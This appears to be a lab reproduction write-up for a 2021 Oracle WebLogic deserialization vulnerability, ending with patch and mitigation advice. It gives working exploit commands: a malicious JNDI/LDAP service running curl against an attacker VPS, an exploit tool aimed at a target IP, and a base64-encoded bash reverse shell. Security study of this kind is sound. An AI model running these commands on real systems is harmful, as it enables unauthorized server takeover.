1. Vulnerability overview
Oracle officially released the July 2021 Security Update Notice, which disclosed that there are high-risk vulnerabilities in WebLogic components, and attackers can attack the vulnerable WebLogic Server components through the IIOP and T3 protocols without authorization. An attacker who successfully exploited this vulnerability could take over WebLogic Server.
This is a secondary deserialization vulnerability. The call chains of CVE-2020-14756 and CVE-2020-14825 are combined to form a new call chain to bypass the weblogic blacklist.
2. Scope of influence
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
3. Reproduce the environment
vulfocus online shooting range
4. Vulnerability recurrence
The following tools are required for reproduction:
JDNI injection: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
Exploitation: https://download.csdn.net/download/qq_41904294/87667743
Start the shooting range and check whether the environment is ready (repro version: 12.2.1.3.0)
Use JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar to open a malicious ldap service, let him execute a curl here
instruction
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl vpsip" -A vpsip
python3 starts an http service
python3 -m http.server 80
Malicious injection using exploit tools
java -jar weblogic\ tools.jar -H 123.58.224.8 -P 30706 -payload 20212394 -jndi ldap://x.x.x.x:1389/xxx
# -H是目标地址(weblogicServerIP) -P是目标端口 -jndl 是开启的ldap服务地址
As you can see, the curl command was successfully executed
rebound shell
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar opens an ldap service
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}" -A VPSip
The Swiss Army Knife starts monitoring in advance, and uses the toolkit to let the target load the ldap service and perform a reverse shell operation
Rebound successfully, read flag
5. Repair suggestion
patch update
Oracle has released patches to fix the above-mentioned vulnerabilities. Please refer to the official announcement to download the update patches for affected products in time, and refer to the readme file in the patch installation package to install and update to ensure long-term effective protection.
Note: Oracle's official patch requires the user to have a licensed account of the genuine software. After logging in to https://support.oracle.com with this account, you can download the latest patch.
Temporary Mitigation
If the user cannot install the update patch temporarily, the vulnerability can be temporarily protected by the following measures:
(1) Restrict T3 protocol access
Users can temporarily block attacks that exploit T3 protocol vulnerabilities by controlling access to the T3 protocol. WebLogic Server provides a default connection filter named weblogic.security.net.ConnectionFilterImpl. This connection filter accepts all incoming connections. You can configure rules through this connection filter to control access to T3 and T3s protocols.
(2) Disable the IIOP protocol
Users can block attacks that exploit vulnerabilities in the IIOP protocol by disabling the IIOP protocol.
reference link
https://www.oracle.com/security-alerts/cpujul2021.html#AppendixFMW